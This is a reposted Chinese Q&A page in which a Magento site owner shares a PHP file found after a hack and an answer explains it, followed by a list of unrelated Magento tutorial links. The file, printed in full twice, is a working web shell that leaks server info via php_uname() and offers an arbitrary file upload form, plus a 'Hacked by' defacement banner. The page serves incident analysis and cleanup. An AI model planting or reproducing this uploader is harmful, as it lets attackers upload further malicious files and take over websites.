首页 / PHP / 我的Magento网站被黑了,这个php代码做了什么？

我的Magento网站被黑了,这个php代码做了什么？

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了我的Magento网站被黑了,这个php代码做了什么？，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含2336字，纯文字阅读大概需要4分钟。

内容图文

我刚刚在我的托管上发现了一些php文件,在php中有0.01％的知识,有人可以解释一下这段代码的作用吗？

<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

解决方法:

代码细分：

如果查询字符串中的变量有值(即index.php？ourzr = set)

<?php 
   if(isset($_GET["ourzr"])){

然后使用功能php_uname()显示有关服务器操作系统的信息.他们使用此信息将下一轮攻击定位到您的系统细节.

echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";

创建一个允许上传更多黑客文件的html表单

         echo"<form method=post enctype=multipart/form-data>";
         echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";

如果已上载文件,请将文件从临时文件夹复制到普通文件夹,而不包含临时名称但原始名称

     if($_POST["v"]==up){
             if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
                    echo"<b>sucess</b>-->".$_FILES["f"]["name"];
                }else{
                    echo"<b>failed</b>";
                }
          }
      }
?>

这部分只是一个小小的消息说“我是来自歹徒队员的kool脚本小子”

<title>Hacked by d3b~X</title>
                            <center>
                                <div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
    <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

结论：

尽快删除此文件

此脚本以某种方式通过可能仍然存在的漏洞上传到您的服务器(除非黑客足够好以便为您修复它).

他们发现将这个文件放在您可以访问它的服务器上,现在他们想用它来继续上传脚本和其他恶意数据.删除此文件,并查看网站上传任何类型文件的任何位置.

下一步：

了解黑客如何使用文件上传来上传这些脚本,以及他们可以使用自己的上传表单执行的其他操作：
https://www.acunetix.com/websitesecurity/upload-forms-threat/

阅读有关如何创建安全上载脚本的信息：There are many other tutorials

阅读更多关于安全性的信息,并尝试学习一些PHP.如果您有任何更具体的问题,请告诉我

追捕这个家伙我猜：https://twitter.com/d3b_x

内容总结

以上是互联网集市为您收集整理的我的Magento网站被黑了,这个php代码做了什么？全部内容，希望文章能够帮你解决我的Magento网站被黑了,这个php代码做了什么？所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/758371.html

来源：【匿名】

【上一篇】php – Laravel / Lumen：无法建立Memcached连接【下一篇】PHP 5 数据对象 (PDO) 抽象层与 Oracle

更多 ►

【我的Magento网站被黑了,这个php代码做了什么？】教程文章相关的互联网学习教程文章

Magento2 php商城在windows10上安装【代码】【图】

magento2下载地址:https://github.com/magento/magento2/archive/develop.zip参考地址: 版本要求这个magento2 要选择好php的版本下载综合版服务器时看好这个服务器支持的具体版本下边的网站有具体的版本要求页,在此就不列出了https://www.magentochina.org/blog/download-install-magento.htmlXAMPP 版本上边明确提示里边带有php的版本.我选的是支持 php 7.0.6的版本下载地址, https://jaist.dl.sourceforge.net/project/xa...

CentOS6.0(64位)安装Apache+PHP+Mysql教程，安装Magento（解决DOM，Mcrypt，GD问题）完整教程

CentOS6.0(64位)安装Apache+PHP+Mysql教程，安装Magento（解决DOM，Mcrypt，GD问题）完整教程0 Posted by :小黑 On : 2012 年 9 月 28 日 Views: 7,586Category:Linux方面点滴分享, 全部分享, 技术分享Tags:centos -bash: make: command not found, centos -bash: phpize: command not found, centos iptables: Applying firewall rules: iptables-restore: line 1 failed, centos6.0 PHP extension "DOM" must be loaded,centos6....

linux php环境搭建以及magento安装教程

听朋友用magento在搭建电商系统，我好奇。遂自己下载了一个包部署了一套。主机采用linux center os6.5，安装程序非常顺利，部署一套大概费时一个小时左右。 #################linux环境搭建##################安装apache2,然后启动：yum install httpd/etc/init.d/httpd start此时，apache能提供http服务，但是不能解析php，也不能连数据库。Apache主配置文件：/etc/httpd/conf/httpd.confApache主配置目录，可以将不同类型的配置分...

php – Magento缓存已关闭但仍缓存文件

我正在运行magento 1.5.1,当关闭缓存进行调试时,文件仍在缓存中. 任何人都可以建议如何完全禁用magento中的缓存机制？解决方法:删除var / cache /下的所有内容以完全刷新基于文件的缓存.如果您的站点使用APC,EACCELERATOR,MEMCACHED或其他缓存引擎,您可能还需要清除或禁用它们

php – 如何清理Magento缓存？【代码】

我需要一个简单的脚本来刷新Magento缓存的每个元素.我正在运行1.3.2.3并且无法升级.解决方法:用于刷新magento缓存的示例cron作业脚本：(该剧本由amartinez在magento论坛上发表) 通过cron作业运行00??0?*?*?*???root?/var/www/html/magento/cron_refresh_cache.php?>>?/var/log/cron_refresh_cache.log php文件：#!/usr/bin/php <?php /** * cron_refresh_cache.php * * @copyright copyright (c) 2009 toniyecla[at]gmail.com * ...

php – 我可以使用Magento的缓存层作为键/值存储吗？

我可以使用Magento的缓存层作为类似于memcached或apc的键/值存储吗？很高兴能够不用担心正在使用什么缓存引擎并且仍然缓存一些代码. 再进一步说明,我会期待Magento在我加入它之后缓存我的Collection.如果由于某种原因Magento没有缓存加入的数据,我也想听听.解决方法:缓存可以直接用作键/值存储,https://web.archive.org/web/20040328220156/http://www.nicksays.co.uk/2010/07/developers-guide-magento-cache/(感谢B00MER为pointi...

magento如何去掉index.php【图】

magento去掉“index.php”的方法：首先依次打开“系统-设置-网站-搜索引擎优化”；然后勾选“是”；最后用域名打开即可去掉“index.php”。推荐：《PHP视频教程》1、系统-设置-网站-搜索引擎优化-是(默认否)2、用域名打开就去掉烦人的index.php了以上就是magento如何去掉index.php的详细内容。本文系统来源：https://www.php.cn/php-ask-458133.html

Magento2.2.5和2.2.6的问题产品设置特价又删除问题分析与解决

Magento是一款专业开源电子商务平台，采用php进行开发，使用Zend Framework框架。然而网上有网友说Magento 2.2.5和2.2.6的bug 产品设置special price又删除后价格排序有误，小编把问题给总结了一下。一、问题描述：版本2.2.5和2.2.6均有此问题，为Magento2的系统bug。为产品设置special price，比如0.5元，这个产品按价格由低到高排序时，排在首位；然后删去special price，保存，重建索引后，此产品显示的价格是正确的，但是即使有...

跨境电商，应该使用magento还是prestashop

公司要开发一个电商平台，现在我们在纠结于是magento适合我们还是prestashop适合我们，我们找到的外包团队，其中一个推荐我们使用magento。大家有做个这两个平台二次开发的请说明下吧，谢谢。回复内容：公司要开发一个电商平台，现在我们在纠结于是magento适合我们还是prestashop适合我们，我们找到的外包团队，其中一个推荐我们使用magento。大家有做个这两个平台二次开发的请说明下吧，谢谢。magento吧，如果你产品比较多的话。...

Magento使用Mage::log（）打印会影响网页响应速度吗？

网站建立之初，技术人员做调试用的是mage::log()，但是后来都没有注释或者删除掉，导致现在网站一运行system.log文件有11MB这么多大，我想问的是mage::log对于相应速度的影响大吗？因为清理这些mage::的工程量有点大。。。回复内容：网站建立之初，技术人员做调试用的是mage::log()，但是后来都没有注释或者删除掉，导致现在网站一运行system.log文件有11MB这么多大，我想问的是mage::log对于相应速度的影响大吗？因为清理这些mage...

magento正常安装后，不能添加属性

不能添加产品属性，点击save attribute 也没没反应。 F12提示ReferenceError: saveAttribute is not defined。请教应该怎么解决？回复内容：不能添加产品属性，点击save attribute 也没没反应。 F12提示ReferenceError: saveAttribute is not defined。请教应该怎么解决？

安装magento之后提示：HTTPERROR500，请问怎么解决？

我在ubuntu14上安装了magento2，网页访问http://localhost/能够显示apache的提示It Work！，但是http://localhost/magento2/提示HTTP ERROR 500我是使用以下的命令安装的：apt-get update apt-get install git wget wget -O /usr/local/bin/composer http://getcomposer.org/composer.phar chmod +x /usr/local/bin/composer cd /var/www git clone https://github.com/magento/magento2.git cd /var/www/magento2 composer instal...

magento2网站10万SKU需要怎么样的配置？

一个magento2网站10万SKU ，需要怎么样的服务器目前8G内存4核还有 php.ini 需要怎么样的配置 mysql ,my.cnf 需要怎么样配置网上看到一些参考如下，想知道该怎么调整这些参数。mysqlinnodb_thread_concurrency = 8innodb_flush_log_at_trx_commit = 2thread_concurrency = 12thread_cache_size = 32table_cache = 1024query_cache_size = 64Mquery_cache_limit = 2Mjoin_buffer_size = 8Mtmp_table_size = 256Mkey_buffer = 32...

如何解决magento2安装过程中缺少两个php扩展的问题：ext-intl和ext-xsl【图】

问题现象：[root@localhost magento2]# pwd/home/wwwroot/default/magento2[root@localhost magento2]# composer installLoading composer repositories with package informationInstalling dependencies (including require-dev) from lock fileWarning: The lock file is not up to date with the latest changes in composer.json. You may be getting outdated dependencies. Run update to update them.Your requirements co...

Magento20怎么设置前台页面的路径提示信息？【图】

有关Magento路径提示信息，在开发中，时不时的会用到，可以快速方便的找到相应模块所在的文件文章，在magento2.0中，如何开启开发者模式，快速找到路径？解决方案：M2 后台--> STORES --> Configuration --> ADVANCED -->Developer -->Debug --> 修改Enabled Template Path Hints for Storefront 为YES，后刷新前台页面，即可看到路径提示信息。（默认为NO）。图示如下：打开configuration之后：刷新页面即可看到前台页面如下图所示...

PHP - 技术教程分类

PHP 教程 PHP 简介 PHP 安装 PHP 语法 PHP 变量 PHP echo/print PHP EOF(heredoc) PHP 数据类型 PHP 类型比较 PHP 常量 PHP 字符串 PHP 运算符 PHP If...Else PHP Switch PHP 数组 PHP 数组排序 PHP 超级全局变量 PHP While 循环 PHP For 循环 PHP 函数 PHP 魔术常量 PHP 命名空间 PHP 面向对象 PHP 测验 PHP 表单 PHP 表单验证 PHP 表单 - 必需字段 PHP 完整表单实例 PHP $_GET 变量 PHP $_POST 变量 PHP 多维数组 PHP 日期 PHP 包含 PHP 文件 PHP 文件上传 PHP Cookie PHP Session PHP E-mail PHP Error PHP Exception PHP 过滤器 PHP 7 新特性 PHP MySQL 简介 PHP MySQL 连接 PHP MySQL 创建数据库 PHP MySQL 创建数据表 PHP MySQL 插入数据 PHP MySQL 插入多条数据 PHP MySQL 预处理语句 PHP MySQL 读取数据 PHP MySQL Where PHP MySQL Order By PHP MySQL Update PHP MySQL Delete PHP ODBC AJAX 简介 AJAX PHP AJAX 数据库 AJAX 实时搜索 AJAX 投票 PHP Array PHP Calendar PHP cURL PHP Date PHP Directory PHP Error PHP Filesystem PHP Filter PHP FTP PHP HTTP PHP Mail PHP Math PHP Misc PHP MySQLi PHP PDO PHP String PHP Zip PHP Timezones PHP 图像处理 PHP RESTful PHP PCRE PHP 可用的函数 PHP Composer php 全部

PHP - 最热教程

php如何取出数组的前几个元素 PHP变量什么时候释放 PHP如何实现在数据库随机获取几条记录如何解决php base64解码乱码 php主要用于哪些领域 Laravel 批量插入(insert)数据六款国内优秀免费wordpress主题推荐 React如何从后端获取数据并渲染到前端？纯PHP实现定时器任务（Timer），php实现...php该如何安装pdo_mysql扩展

首页 / PHP / 我的Magento网站被黑了,这个php代码做了什么？

我的Magento网站被黑了,这个php代码做了什么？

内容导读

内容图文

内容总结

内容备注

内容手机端

【我的Magento网站被黑了,这个php代码做了什么？】教程文章相关的互联网学习教程文章

Magento2 php商城在windows10上安装【代码】【图】

CentOS6.0(64位)安装Apache+PHP+Mysql教程，安装Magento（解决DOM，Mcrypt，GD问题）完整教程

linux php环境搭建以及magento安装教程

php – Magento缓存已关闭但仍缓存文件

php – 如何清理Magento缓存？【代码】

php – 我可以使用Magento的缓存层作为键/值存储吗？

magento如何去掉index.php【图】

Magento2.2.5和2.2.6的问题产品设置特价又删除问题分析与解决

跨境电商，应该使用magento还是prestashop

Magento使用Mage::log（）打印会影响网页响应速度吗？

magento正常安装后，不能添加属性

安装magento之后提示：HTTPERROR500，请问怎么解决？

magento2网站10万SKU需要怎么样的配置？

如何解决magento2安装过程中缺少两个php扩展的问题：ext-intl和ext-xsl【图】

Magento20怎么设置前台页面的路径提示信息？【图】

PHP - 相关标签

PHP - 技术教程分类

PHP - 最新教程

PHP - 最热教程